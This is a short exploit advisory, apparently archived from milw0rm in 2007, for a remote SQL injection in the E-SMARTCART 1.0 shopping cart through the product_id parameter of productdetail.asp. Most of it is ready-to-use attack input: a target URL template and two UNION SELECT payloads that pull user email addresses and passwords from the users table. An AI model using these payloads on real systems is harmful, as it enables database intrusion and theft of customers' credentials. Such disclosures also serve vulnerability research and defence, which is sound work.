ESMARTCART 1.0 product_id Remote SQL Injection Vulnerability.pdf

1 ******************************************************************************* 2 # Title : E−SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability 3 # Author : ajann 4 # Contact : :( 5 # S.Page : ... 6 # $ : $49.00 7 8 ******************************************************************************* 9 10 [[SQL]]]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 11 12 http://[target]/[path]//productdetail.asp?p=1&subcat_id=−1&category_id=−1&product_id=[SQL] 13 14 Example: 15 16 //productdetail.asp?p=1&subcat_id=−1&category_id=−1&product_id=−1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0, 0%20from%20users 17 //productdetail.asp?p=1&subcat_id=−1&category_id=−1&product_id=−1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0 ,0,0,0,0%20from%20users 18 19 [[/SQL]] 20 21 """"""""""""""""""""" 22 # ajann,Turkey 23 # ... 24 25 # Im not Hacker! 26 27 # milw0rm.com [2007−01−03] Page 1/1 ESMARTCART 1.0 product_id Remote SQL Injection Vulnerability ajann 01/03/2007